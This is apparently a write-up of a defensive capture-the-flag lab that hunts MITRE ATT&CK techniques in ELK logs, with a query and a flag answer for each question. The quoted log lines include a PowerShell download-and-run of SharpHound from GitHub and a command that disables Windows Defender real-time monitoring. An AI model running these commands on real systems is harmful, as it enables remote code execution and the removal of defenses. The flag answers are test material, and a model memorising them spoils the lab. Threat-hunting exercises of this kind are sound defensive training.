Loading
Loading Artifacts

Phase 3 ELK

Reconnaissance

Q1

In the ELK dashboard, search for evidence of MITRE ATT&CK ID T1059.001 - specifically for encoded PowerShell commands. What is the flag listed in the command?

 powershell.exe AND EncodedCommand
SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQmxvb2RIb3VuZEFEL0Jsb29kSG91bmQvODA0NTAzOTYyYjZkYzU1NGFkN2QzMjRjZmE3ZjJiNGE1NjZhMTRlMi9Jbmdlc3RvcnMvU2hhcnBIb3VuZC5wczEnKTsgZWNobyAiVFRQX0ZMQUd7NWNhZGRlYTVkNTI3YzYxZDM1Nzg1OTRhZGQyYWQ5ZmZ9Ig==
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/80450396b2b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); echo "TTP_FLAG{5caddea5d527c61d3578594add2ad9ff}"

Answer:

TTP_FLAG{5caddea5d527c61d3578594add2ad9ff}

Q2

In the ELK dashboard, identify evidence related to MITRE ATT&CK technique T1547.001. During your investigation, you will find a hexadecimal string used as a flag. What is the value of that string? Include only the hexadecimal string.

 (event.code:13 OR event.code:12) AND "CurrentVersion\\Run"
HKU\\S-1-5-21-3688751335-3073641799-161370460-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\FL@G: a8f5f167f44f4964e6c998dee827110c

Answer:

a8f5f167f44f4964e6c998dee827110c

Q3

What is the name of the file associated with MITRE ATT&CK ID T1218.005? (filename only)

mshta.exe

Q4

In the 'actions on objectives' stage of their attack, the attacker is attempting to use methods indicated in MITRE ATT&CK ID T1003.002. Find evidence of this in the logs, and enter the flag. (Flag will show in the logs as a filename)

 dump

Answer:

FFFLAAAAG-a3dcb4d229de6fde0db5686dee47145d.dmp

Q5

In preparation for the installation phase of their attack, the attacker makes use of MITRE ATT&CK ID T1562.001 to disable built-in Windows Defender. What is the flag shown for that indicator? (Only include the portion of the flag within the brackets {}, do not include the brackets themselves)

DisableRealtimeMonitoring
powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring True # FL @ G {525118d8317f54222985e09a922bad86}

Answer:

525118d8317f54222985e09a922bad86

All Content

0/1000
Loading comments...